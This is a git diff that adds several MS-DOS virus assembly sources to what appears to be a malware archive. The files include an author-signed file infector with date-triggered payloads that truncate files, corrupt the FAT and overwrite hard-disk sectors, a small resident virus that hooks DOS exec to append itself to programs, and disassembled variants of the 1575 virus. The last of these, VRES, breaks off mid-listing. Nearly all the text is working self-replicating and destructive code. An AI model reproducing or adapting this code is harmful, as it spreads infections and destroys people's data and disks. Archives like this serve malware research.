+;hmm.,.,.,.,without a name.,.,.,., +;this file is much like the 606, only it +;is much more harmful...it has a special suprise +;for three diffrent dates....hehehehe.,.,,..,., +;i had planned to have it in with the other TR- +;series, but this was much to large to add in with.,., +;enjoy!.... +; nUcLeii +; [*v i a*]===[98] + + + +.model tiny +.code + +seg_a segment byte public + ASSUME CS: SEG_A, DS: SEG_A, ES: SEG_A + +filename equ 30 ;find file name +fileattr equ 21 ;find file attributes +filedate equ 24 ;find file date +filetime equ 22 ;fine file time + +org 100h + +main proc +start: + call dirloc + +infect: + mov dx, 100h + mov bx, handle + mov cx, 1203 + mov ah, 40h + int 21h + ret + +dirloc: + mov dx, offset dirdat ;offset to hold new dta + mov ah, 1ah ;set dta address + int 21h + +newdir: + mov ah,19h ;get drive code + int 21h + mov dl, al ;save drive code + inc dl ;add one to dl (functions differ) + mov ah, 47h ;get current directory + mov si, offset currentdir ;buffer to save directory in + int 21h + mov dx, offset daroot ;move dx to change to root + mov ah, 3bh ;change directory to root + int 21h + +find: + mov cx, 13h ;include hidden/ro dir. + mov dx, offset wild ;look for '*' + mov ah, 4eh ;find file + int 21h + cmp ax, 12h ;no file? + jne findmore ;no dir? screw it then. + +wank1: + jmp rollout + +findmore: + mov ah, 4fh ;find next target + int 21h + cmp ax, 12h + je wank ;no more? crew it then. + +keepgoin: + mov dx, offset dirdat+filename ;point dx to fcb-filename + mov ah, 3bh ;change directory + int 21h + mov ah, 2fh ;get current dta address + int 21h + mov [diskdat], es ;save old segment + mov [diskdatofs], bx ;save old offset + mov dx, offset filedat ;offset to hold new dta + mov ah, 1ah ;set dta address + int 21h + +checkit: + mov cx, 07h ;find any attribute + mov dx, offset filetype ;point dx to exe files + mov ah, 4eh ;find first file function + int 21h + cmp ax, 12h ;was it found? + jne change + +nextfile: + mov ah, 4fh ;find next file + int 21h + cmp ax,12h ;none found + jne change ;see what we can do... + mov dx, offset daroot ;dx to change to root directory + mov ah, 3bh + int 21h + mov ah, 1ah ;set dta address + mov ds, [diskdat] ;restore old segment + mov dx, [diskdatofs] ;restore old offset + int 21h + jmp findmore +wank: + jmp rollout + +change: + mov ah, 2fh ;temp. store dta + int 21h + mov [tempseg], es ;save old segment + mov [tempofs], bx ;save old offset + mov dx, offset filedat+filename + mov bx, offset filedat ;save file... + mov ax, [bx]+filedate ;tha date + mov orig_date, ax + mov ax, [bx]+filetime ;tha time + mov orig_time, ax + mov ax, [bx]+fileattr ;tha attributes + mov ax, 4300h + int 21h + mov orig_attr, cx + mov ax, 4301h ;change attributes + xor cx, cx ;clear attributes + int 21h + mov ax, 3d00h ;open file and read + int 21h + jc fixup ;error?..go get another! + mov handle, ax ;save handle + mov ah, 3fh ;read from file + mov bx, handle ;move handle to bx + mov cx, 02h ;read 2 bytes + mov dx, offset idbuffer ;save to buffer + int 21h + mov ah, 3eh ;close it for now + mov bx, handle ;load bx with handle + int 21h + mov bx, idbuffer ;give bx the id string + cmp bx, 02ebh ;are we infected? + jne doit ;hmm...go get another. + +fixup: + mov ah, 1ah ;set dta address + mov ds, [tempseg] ;restore old segment + mov dx, [tempofs] ;restore old offset + int 21h + jmp nextfile + +doit: + mov dx, offset filedat+filename + mov ax, 3d02h ;open victim read/write access + int 21h + mov handle, ax ;save handle + call infect ;do your job... + ;mov ax, 3eh + ;int 21h + +rollout: + mov ax, 5701h ;restore original... + mov bx, handle ;handle + mov cx, orig_time ;time + mov dx, orig_date ;date + int 21h + mov ax, 4301h ;and attributes + mov cx, orig_attr + mov dx, offset filedat+filename + int 21h + ;mov bx, handle + ;mov ax, 3eh ;close em" + ;int 21h + mov ah, 3bh ;try this for speed... + mov dx, offset daroot + int 21h + mov ah, 3bh ;change directory + mov dx, offset currentdir ;back to the original + int 21h + mov ah, 2ah ;check system date + int 21h + cmp cx, 1998 ;hehe..if not then your already + jb getout ;screwed an ill leave ya alone. + cmp dl, 15 ;is it the 15th?...muhahaha + jne goaway ;not?...lucky you. + cmp dl, 19 ;is it the 19th?...muhahaha + je alter_fat ;your gonna have a few crosslinks... + cmp dl, 29 ;is it the 29th?...muhahaha + je ouch ;your screwed,..,.,.,., + mov dx, offset dirdat ;offset to hold new dta + mov ah, 1ah ;set dta address + int 21h + mov ah, 4eh ;find first file + mov cx, 7h + mov dx, offset allfiles ;offset *.* ...hehehe... + jmp rockem + +getout: + call outta + +goaway: + call outta + +rockem: + int 21h + jc goaway ;error? screw it then... + mov ax, 4301h ;find all "normal" files + xor cx, cx + int 21h + mov dx, offset dirdat+filename + mov ah, 3ch ;write to all files in current dir. + int 21h + jc outta ;error? screw it then... + mov ah, 4fh ;find next file + jmp rockem + +ouch: + xor dx, dx ;clear dx + +rip_hd1: + mov cx, 1 ;track 0, sector 1 + mov ax, 311h ;17 secs per track (hopefully!) + mov dl, 80h + mov bx, 5000h + mov es, bx + int 13h ;kill 17 sectors + jae rip_hd2 + xor ah, ah + int 13h ;reset disks if needed +rip_hd2: + inc dh ;increment head number + cmp dh, 4 ;if head number is below 4 then + jb rip_hd1 ;go kill another 17 sectors + inc ch ;increase track number and + jmp ouch ;do it again + +alter_fat: + push dx + push bx + push cx + push ax + push bp ;save regs that will be changed + mov ax, 0dh + int 21h ;reset disk + mov ah, 19h + int 21h ;get default disk + xor dx, dx + call load_sec ;read in the boot record + mov bp, bx + mov bx, word ptr es:[bp+16h] ;find sectors per fat + push ax ;save drive number + call rnd_num ;get random number + cmp bx, ax ;if random number is lower than + jbe alter_fat1 ;secs per fat then jump and kill 'em + mov ax, bx ;else pick final sector of fat +alter_fat1: + + int 26h ;write same data in that fat + pop bp + pop ax + pop cx + pop bx + pop dx + jmp outta + +rnd_num: + push cx + push dx ;save regs that will be changed + xor ax, ax + int 1ah ;get system time + xchg dx, ax ;put lower word into ax + pop dx + pop cx + ret ;restore values and return + +load_sec: + push cx + push ds ;save regs that will be changed + push ax ;save drive number + push cs + pop ds + push cs + pop es ;make es and ds the same as cs + mov ax, 0dh + int 21h ;reset disk + pop ax ;restore drive number + mov cx, 1 + mov bx, offset sec_buf + int 25h ;read sector into buffer + pop ds + pop cx + ret ;restore regs and return + +outta: + mov ax, 4c00h ;end program + int 21h + +words_ db "nUcLeii~ *v. i. a*",0 +words2 db "1200..n0name",0 +allfiles db "*.*",0 +currentdir db 64 dup (?) +daroot db "\",0 +dirdat db 43 dup (?) +diskdat dw ? +diskdatofs dw ? +filedat db 43 dup (?) +filetype db "*.com",0 +handle dw ? +idbuffer dw ? +orig_attr dw ? +orig_date dw ? +orig_time dw ? +sec_buf dw 100h dup(?) +tempofs dw ? +tempseg dw ? +wild db "*",0 + +main endp +seg_a ends +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.133.asm b/MSDOS/Virus.MSDOS.Unknown.133.asm new file mode 100644 index 00000000..13bfc613 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.133.asm @@ -0,0 +1,99 @@ +VSize=085h + +Code Segment + Assume CS:Code + org 0 + db 4Dh + jmp Start + + Org 600h + +Bytes db 0CDh,20h,90h,90h + +Start: mov si, 0100h + mov bx, offset Int21 + mov cx, 0050h + mov di, si + add si, [si+2] + push di + movsw + movsw + mov es, cx + cmpsb + je StartFile + dec si + dec di + rep movsw + mov es, cx + xchg ax, bx + xchg ax, cx +Loop0: xchg ax, cx + xchg ax, word ptr es:[di-120h] + stosw + jcxz Loop0 + xchg ax, bx +StartFile: + push ds + pop es + ret + +Int21: cmp ax, 4B00h + jne End21 +Exec: push ax + push bx + push dx + push ds + push es + mov ax, 3D02h + call DoInt21 + jc EndExec + cbw ;Zero AH + cwd ;Zero DX + mov bx, si ;Move handle to BX + mov ds, ax ;Set DS and ES to 60h, + mov es, ax ;the virus data segment + mov ah, 3Fh ;Read first 4 bytes + int 69h + mov al, 4Dh + scasb ;Check for 4D5Ah or infected file mark + je Close ;.EXE or already infected + mov al, 2 + call LSeek ;Seek to the end, SI now contains file size + mov cl, VSize ;Virus size in CX, prepare to write + int 69h ;AH is 40h, i.e. Write operation + mov ax, 0E94Dh ;Virus header in AX + stosw ;Store it + xchg ax, si ;Move file size in AX + stosw ;Complete JMP instruction + xchg ax, dx ;Zero AX + call LSeek ;Seek to the beginning + int 69h ;AH is 40h, write the virus header +Close: mov ah,3Eh ;Close the file + int 69h +EndExec: pop es + pop ds + pop dx + pop bx + pop ax +End21: jmp dword ptr cs:[69h * 4] + +LSeek: mov ah, 42h ;Seek operation + cwd ;Zero DX +DoInt21: xor cx, cx ;External entry for Open, zero cx + int 69h + mov cl, 4 ;4 bytes will be read/written + xchg ax, si ;Store AX in SI + mov ax, 4060h ;Prepare AH for Write + xor di, di ;Zero DI + ret + +VLen = $ - offset Bytes + +Code EndS +End + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.1575-e.asm b/MSDOS/Virus.MSDOS.Unknown.1575-e.asm new file mode 100644 index 00000000..76d3a1fc --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1575-e.asm @@ -0,0 +1,983 @@ + +PAGE 59,132 + +; +; +; 1575-E +; +; Created: 23-May-92 +; Passes: 5 Analysis Options on: none +; +; + +data_1e equ 6 +data_2e equ 84h +data_3e equ 86h +data_4e equ 100h +data_10e equ 31Fh +data_12e equ 0 ;* +data_13e equ 3 ;* +data_14e equ 12h ;* +data_15e equ 0 +data_55e equ 0FA0h +data_56e equ 6B0h +data_57e equ 725h + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +1575-e proc far + +start: + jmp short loc_4 + db 90h +data_17 dw 0B2Bh, 103Eh +data_19 dw 0FF53h +data_20 dw 0F000h +data_21 db 0B4h + db 2 +data_22 dw 2AB2h +data_23 dw 21CDh + db 0CDh, 20h +data_24 dw 0E5h + db 3Dh, 02h,0FFh,0FFh +data_25 dw 50Fh +data_26 dw 100h + db 26h,0D9h +data_27 dw 100h +data_28 dw 50Fh +data_29 dw 480h +data_30 dw 0 +data_31 dw 0 +data_32 dw 53F0h +data_33 dw 5 +data_34 dw 648Ch +data_35 dw 789Fh +data_36 dw 480h +data_37 dw 0BD1h +data_38 dw 1213h +data_39 dw 0EA2h +data_40 dw 5BFh +data_41 db 4Dh +data_42 db 31h + db 68h, 7Dh, 02h,0FBh, 07h + db 70h, 00h + +loc_ret_2: + retn + db 0E2h, 00h + db 0F0h,0FBh, 07h, 70h, 00h +loc_4: + push es + push ds + mov ax,es + push cs + pop ds + push cs + pop es + mov data_38,ax + mov ax,ss + mov data_33,ax + std ; Set direction flag + mov ax,7076h + cld ; Clear direction + xor ax,ax ; Zero register + mov ds,ax + xor si,si ; Zero register + mov di,offset data_42 + mov cx,10h + repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] + push ds + pop ss + mov bp,8 + xchg bp,sp + call sub_2 + jmp loc_27 +loc_5: + call sub_13 + call sub_3 + jz loc_6 ; Jump if zero + mov al,data_53 + push ax + call sub_4 + pop ax + mov data_53,al + jmp short loc_7 + db 90h +loc_6: + call sub_6 + call sub_7 + cmp byte ptr data_53,0 + jne loc_7 ; Jump if not equal + mov ax,4C00h + int 21h ; DOS Services ah=function 4Ch + ; terminate with al=return code +loc_7: + cmp byte ptr data_53,43h ; 'C' + jne loc_10 ; Jump if not equal +loc_8: + pop ds + pop es + push cs + pop ds + pop es + push es + mov di,data_4e + mov si,offset data_21 + mov cx,0Ch + repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] + push es + pop ds + mov ax,100h + push ax + xor ax,ax ; Zero register + retf ; Return far + +1575-e endp + +; +; SUBROUTINE +; + +sub_2 proc near + mov si,data_1e + lodsw ; String [si] to ax + cmp ax,192h + je loc_8 ; Jump if equal + cmp ax,179h + jne loc_9 ; Jump if not equal + jmp loc_12 +loc_9: + cmp ax,1DCh + je loc_10 ; Jump if equal + retn +loc_10: + pop ds + pop es + mov bx,cs:data_25 + sub bx,cs:data_36 + mov ax,cs + sub ax,bx + mov ss,ax + mov bp,cs:data_37 + xchg bp,sp + mov bx,cs:data_28 + sub bx,cs:data_29 + mov ax,cs + sub ax,bx + push ax + mov ax,cs:data_30 + push ax + retf ; Return far +data_43 db 23h + db 1Ah + db '<#/--!.$' + db 0Eh, 23h, 2Fh, 2Dh,0E0h +data_44 db 'A:MIO.COM', 0 + db 58h, 45h, 00h, 00h, 00h + db 24h, 24h, 24h, 24h, 24h + +; External Entry into Subroutine + +sub_3: + mov ax,3D02h + mov dx,offset data_44 ; ('A:MIO.COM') + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_11 ; Jump if carry=0 + clc ; Clear carry flag + retn +loc_11: + mov data_33,ax + mov dx,offset int_24h_entry + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,4202h + mov bx,data_33 + mov cx,0FFFFh + mov dx,0FFFEh + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov dx,offset data_45 + mov ah,3Fh ; '?' + mov bx,data_33 + mov cx,2 + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push ds + mov dx,data_40 + mov ax,data_39 + mov ds,ax + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop ds + cmp data_45,0A0Ch + clc ; Clear carry flag + retn +data_45 dw 20CDh +loc_12: + cmp ax,22Dh + je loc_13 ; Jump if equal + push ds + pop es + push cs + pop ds + mov ax,data_33 + mov ss,ax + xchg bp,sp + mov si,offset data_42 + mov di,data_15e + mov cx,10h + cld ; Clear direction + repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] + jmp loc_5 +sub_2 endp + + +; +; SUBROUTINE +; + +sub_4 proc near +loc_13: + mov al,43h ; 'C' + mov data_53,al + mov al,8 + out 70h,al ; port 70h, RTC addr/enabl NMI + ; al = 8, month register + in al,71h ; port 71h, RTC clock/RAM data + mov data_41,al + mov dx,offset data_44 ; ('A:MIO.COM') + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_14 ; Jump if carry=0 + retn +loc_14: + mov data_33,ax + mov dx,offset data_21 + mov bx,data_33 + mov cx,0Ch + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + push ax + add ax,10h + and ax,0FFF0h + push ax + shr ax,1 ; Shift w/zeros fill + shr ax,1 ; Shift w/zeros fill + shr ax,1 ; Shift w/zeros fill + shr ax,1 ; Shift w/zeros fill + mov di,data_10e + stosw ; Store ax to es:[di] + pop ax + pop bx + sub ax,bx + mov cx,627h + add cx,ax + mov dx,100h + sub dx,ax + mov bx,data_33 + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov ah,40h ; '@' + mov bx,data_33 + mov cx,0Ch + mov dx,offset data_46 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ah,3Eh ; '>' + mov bx,data_33 + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + retn +sub_4 endp + +data_46 db 0Eh + db 8Ch,0C8h, 05h, 01h, 00h, 50h + db 0B8h, 00h, 01h, 50h,0CBh + +; +; SUBROUTINE +; + +sub_5 proc near + mov al,45h ; 'E' + mov data_53,al + mov al,8 + out 70h,al ; port 70h, RTC addr/enabl NMI + ; al = 8, month register + in al,71h ; port 71h, RTC clock/RAM data + mov data_41,al + mov dx,offset data_44 ; ('A:MIO.COM') + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_15 ; Jump if carry=0 + retn +loc_15: + mov data_33,ax + mov dx,offset data_21 + mov bx,data_33 + mov cx,18h + mov ah,3Fh ; '?' + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov ax,4202h + mov cx,0 + mov dx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + push ax + add ax,10h + adc dx,0 + and ax,0FFF0h + mov data_31,dx + mov data_32,ax + mov cx,727h + sub cx,100h + add ax,cx + adc dx,0 + mov cx,200h + div cx ; ax,dx rem=dx:ax/reg + inc ax + mov data_23,ax + mov data_22,dx + mov ax,data_28 + mov data_29,ax + mov ax,data_27 + mov data_30,ax + mov ax,data_25 + mov data_36,ax + mov ax,data_26 + mov data_37,ax + mov dx,data_31 + mov ax,data_32 + mov cx,10h + div cx ; ax,dx rem=dx:ax/reg + sub ax,10h + sub ax,data_24 + mov data_28,ax + mov data_25,ax + mov data_27,100h + mov data_26,100h + mov ax,4200h + xor cx,cx ; Zero register + mov dx,2 + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov dx,offset data_22 + mov bx,data_33 + mov cx,16h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov dx,100h + mov ax,data_32 + pop cx + sub ax,cx + sub dx,ax + mov cx,727h + add cx,ax + sub cx,100h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + retn +sub_5 endp + + push cx + mov cx,0 + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + pop cx + retn + +; +; SUBROUTINE +; + +sub_6 proc near + push es + mov ax,351Ch + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov cs:data_19,bx + mov cs:data_20,es + mov ax,3521h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + push es + pop ax + mov word ptr cs:data_17+2,ax + mov cs:data_17,bx + pop es + retn +sub_6 endp + + +; +; SUBROUTINE +; + +sub_7 proc near + push ax + push es + push ds + xor ax,ax ; Zero register + mov es,ax + mov si,data_3e + mov ax,es:[si] + mov ds,ax + mov si,data_57e + cmp word ptr [si],0A0Ch + jne loc_16 ; Jump if not equal + push ds + pop ax + call sub_14 + pop ds + pop es + pop ax + retn +loc_16: + push cs + pop ds + mov ax,data_38 + dec ax + mov es,ax + cmp byte ptr es:data_12e,5Ah ; 'Z' + nop ;*ASM fixup - sign extn byte + je loc_17 ; Jump if equal + jmp short loc_18 + db 90h +loc_17: + mov ax,es:data_13e + mov cx,737h + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + sub ax,cx + jc loc_18 ; Jump if carry Set + mov es:data_13e,ax + sub es:data_14e,cx + push cs + pop ds + mov ax,es:data_14e + push ax + pop es + mov si,100h + push si + pop di + mov cx,627h + cld ; Clear direction + repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] + push es + sub ax,ax + mov es,ax + mov si,data_2e + mov dx,4A8h + mov es:[si],dx + inc si + inc si + pop ax + mov es:[si],ax +loc_18: + pop ds + pop es + pop ax + retn +sub_7 endp + + cmp al,57h ; 'W' + jne loc_19 ; Jump if not equal + jmp short loc_22 + db 90h +loc_19: + cmp ah,1Ah + jne loc_20 ; Jump if not equal + call sub_12 + jmp short loc_22 + db 90h +loc_20: + cmp ah,11h + jne loc_21 ; Jump if not equal + call sub_8 + iret ; Interrupt return +loc_21: + cmp ah,12h + jne loc_22 ; Jump if not equal + call sub_11 + iret ; Interrupt return +loc_22: + jmp dword ptr cs:data_17 + +; +; SUBROUTINE +; + +sub_8 proc near + mov al,57h ; 'W' + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx + push ax + push cx + push dx + push bx + push bp + push si + push di + push ds + push es + push cs + pop ds + push cs + pop es + mov byte ptr cs:data_47,0 + nop + call sub_9 + jnz loc_23 ; Jump if not zero + call sub_3 + jz loc_23 ; Jump if zero + call sub_16 + dec data_47 +loc_23: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + retn +sub_8 endp + + +; +; SUBROUTINE +; + +sub_9 proc near + push cs + pop es + push cs + pop es + cld ; Clear direction + call sub_10 + jnc loc_24 ; Jump if carry=0 + cmp di,0 + retn +loc_24: + mov di,offset data_44 ; ('A:MIO.COM') + mov al,2Eh ; '.' + mov cx,0Bh + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + cmp word ptr [di],4F43h + jne loc_25 ; Jump if not equal + cmp byte ptr [di+2],4Dh ; 'M' + jne loc_25 ; Jump if not equal + mov byte ptr data_53,43h ; 'C' + nop + retn +loc_25: + cmp word ptr [di],5845h + jne loc_ret_26 ; Jump if not equal + cmp byte ptr [di+2],45h ; 'E' + jne loc_ret_26 ; Jump if not equal + mov byte ptr data_53,45h ; 'E' + nop + +loc_ret_26: + retn +sub_9 endp + + +; +; SUBROUTINE +; + +sub_10 proc near +loc_27: + push ds + mov si,cs:data_34 + mov ax,cs:data_35 + mov ds,ax + mov di,offset data_44 ; ('A:MIO.COM') + lodsb ; String [si] to al + cmp al,0FFh + jne loc_28 ; Jump if not equal + add si,6 + lodsb ; String [si] to al + jmp short loc_29 + db 90h +loc_28: + cmp al,5 + jb loc_29 ; Jump if below + pop ds + stc ; Set carry flag + retn +loc_29: + mov cx,0Bh + cmp al,0 + je locloop_30 ; Jump if equal + add al,40h ; '@' + stosb ; Store al to es:[di] + mov al,3Ah ; ':' + stosb ; Store al to es:[di] + +locloop_30: + lodsb ; String [si] to al + cmp al,20h ; ' ' + je loc_31 ; Jump if equal + stosb ; Store al to es:[di] + jmp short loc_32 + db 90h +loc_31: + cmp byte ptr es:[di-1],2Eh ; '.' + je loc_32 ; Jump if equal + mov al,2Eh ; '.' + stosb ; Store al to es:[di] +loc_32: + loop locloop_30 ; Loop if cx > 0 + + mov al,0 + stosb ; Store al to es:[di] + pop ds + clc ; Clear carry flag + retn +sub_10 endp + + +; +; SUBROUTINE +; + +sub_11 proc near + mov al,57h ; 'W' + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx + push ax + push cx + push dx + push bx + push bp + push si + push di + push ds + push es + push cs + pop ds + push cs + pop es + cmp byte ptr cs:data_47,0 + je loc_33 ; Jump if equal + jmp short loc_34 + db 90h +loc_33: + call sub_9 + jnz loc_34 ; Jump if not zero + call sub_3 + jz loc_34 ; Jump if zero + call sub_16 + dec data_47 + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + retn +loc_34: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + retn +sub_11 endp + +data_47 db 0 + +; +; SUBROUTINE +; + +sub_12 proc near + push ax + push ds + pop ax + mov cs:data_35,ax + mov cs:data_34,dx + pop ax + retn +sub_12 endp + + +; +; SUBROUTINE +; + +sub_13 proc near + push cs + mov al,0 + out 20h,al ; port 20h, 8259-1 int command + mov ax,3524h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov data_40,bx + mov bx,es + mov data_39,bx + pop es + mov si,offset data_43 + mov di,offset data_44 ; ('A:MIO.COM') + mov cx,0Fh + +locloop_35: + lodsb ; String [si] to al + add al,20h ; ' ' + stosb ; Store al to es:[di] + loop locloop_35 ; Loop if cx > 0 + + retn +sub_13 endp + + +; +; SUBROUTINE +; + +sub_14 proc near + push ax + push cs + pop ds + push cs + pop es + mov bl,data_41 + cmp bl,0Ch + ja loc_37 ; Jump if above + cmp bl,0 + je loc_37 ; Jump if equal + mov al,8 + out 70h,al ; port 70h, RTC addr/enabl NMI + ; al = 8, month register + in al,71h ; port 71h, RTC clock/RAM data + cmp al,0Ch + ja loc_37 ; Jump if above + cmp al,0 + je loc_37 ; Jump if equal + cmp al,bl + je loc_37 ; Jump if equal + inc bl + call sub_15 + cmp al,bl + je loc_37 ; Jump if equal + inc bl + call sub_15 + cmp al,bl + je loc_37 ; Jump if equal + pop ds + call sub_17 + push cs + pop ds + retn + +; External Entry into Subroutine + +sub_15: + cmp bl,0Ch + jbe loc_ret_36 ; Jump if below or = + sub bl,0Ch + +loc_ret_36: + retn +loc_37: + pop ax + retn +sub_14 endp + + +; +; SUBROUTINE +; + +sub_16 proc near + mov dx,offset int_24h_entry + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + cmp byte ptr data_53,43h ; 'C' + jne loc_38 ; Jump if not equal + call sub_4 + jmp short loc_39 + db 90h +loc_38: + call sub_5 +loc_39: + push ds + mov dx,data_40 + mov ax,data_39 + mov ds,ax + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop ds + retn +sub_16 endp + + +; +; +; External Entry Point +; +; + +int_24h_entry proc far + mov al,3 + iret ; Interrupt return +int_24h_entry endp + + +; +; SUBROUTINE +; + +sub_17 proc near +;* mov dx,offset loc_47 ;* + db 0BAh,0B0h, 06h + mov ax,251Ch + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov byte ptr ds:data_56e,90h + nop + mov ax,0B800h + mov es,ax + mov di,data_55e + mov ax,720h + mov cx,0Bh + repne stosw ; Rep zf=0+cx >0 Store ax to es:[di] + push cs + pop es + retn +sub_17 endp + + db 0, 0 +data_48 db 0 +data_49 dw 720h +data_50 db 0Fh + db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh + db 0Ah, 0Fh, 0Ah, 0Fh, 0Ah, 0Fh + db 0Ah, 0Fh, 08h,0FEh, 0Eh +data_51 db 0EEh + db 0Ch +data_52 db 90h + db 0FBh, 50h, 51h, 52h, 53h, 55h + db 56h, 57h, 1Eh, 06h, 0Eh, 1Fh + db 0EBh, 0Bh, 90h +loc_40: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + iret ; Interrupt return + db 0B8h, 00h,0B8h, 8Eh,0C0h + db 0BFh,0A0h, 0Fh + db 0BEh, 9Ah, 06h,0B9h, 16h, 00h + db 0F2h,0A4h, 80h, 3Eh,0AEh, 06h + db 0EEh, 74h, 08h,0C6h, 06h,0AEh + db 06h,0EEh,0EBh, 06h, 90h +loc_42: + mov data_51,0F0h +loc_43: + mov ax,es:[di] + mov ah,0Eh + mov data_49,ax + mov data_48,0 + jmp short loc_40 + db 0BFh, 00h, 00h +loc_44: + mov si,offset data_50 + push di + mov cx,12h + cld ; Clear direction + repe cmpsb ; Rep zf=1+cx >0 Cmp [si] to es:[di] + pop di + jz loc_45 ; Jump if zero + inc di + inc di + cmp di,0FA0h + jne loc_44 ; Jump if not equal + mov di,0 +loc_45: + cmp di,0F9Eh + jne loc_ret_46 ; Jump if not equal + mov data_52,0CFh + +loc_ret_46: + retn +data_53 db 43h + db 0Ch, 0Ah, 45h, 00h,0CBh, 87h + db 0BFh, 1Dh, 25h, 1Eh, 57h, 9Ah + db 83h, 00h,0CBh, 87h,0E8h + db 2Eh + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.1575.asm b/MSDOS/Virus.MSDOS.Unknown.1575.asm new file mode 100644 index 00000000..7c94fa06 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.1575.asm @@ -0,0 +1,947 @@ + +PAGE 60,132 + +; +; +; VRES +; +; Created: 4-Jan-92 +; Passes: 5 Analysis Flags on: H +; +; + +data_1e equ 12Bh +data_2e equ 137h +data_3e equ 139h +data_4e equ 13Bh +data_5e equ 27Dh +data_6e equ 5CDh +data_7e equ 724h +data_8e equ 6B0h +data_9e equ 3 +data_10e equ 12h + +seg_a segment + assume cs:seg_a, ds:seg_a + + + org 100h + +vres proc far + +start: + push cs + mov ax,cs +data_11 dw 105h +data_12 dw 5000h +data_13 dw 0B8h +data_14 dw 5001h + db 0CBh, 0 +data_15 dw 0 +data_16 dw 0EB00h + db 4Ah, 90h +data_17 dw 1460h + db 74h, 2, 53h, 0FFh +data_18 dw 0F000h +data_19 dw 3B8h + db 0, 0CDh +data_20 dw 0CD10h +data_21 dw 20h +data_22 dw 20h +data_23 dw 11h +data_24 dw 0FFFFh +data_25 dw 4 +data_26 dw 100h +data_27 dw 674Fh +data_28 dw 100h +data_29 dw 4 +data_30 dw 0 +data_31 dw 0 +data_32 dw 0 +data_33 dw 340h +data_34 db 5 + db 0, 8Ah, 43h, 0B7h, 9Ah, 14h + db 0, 0, 1, 71h, 0Dh, 8Eh + db 0Ch, 56h, 5, 1, 0EAh, 56h + db 74h, 2, 5Ch, 7, 70h, 0 +loc_1: + push ss + add al,al + or bx,[si+7] + jo loc_2 ; Jump if overflow=1 +loc_2: + push es + push ds + mov ax,es + push cs + pop ds + push cs + pop es + mov data_31,ax + mov ax,ss + mov data_26,ax + mov al,2 + out 20h,al ; port 20h, 8259-1 int command + cld ; Clear direction + xor ax,ax ; Zero register + mov ds,ax + xor si,si ; Zero register + mov di,13Ch + mov cx,10h + repne movsb ; Rep while cx>0 Mov [si] 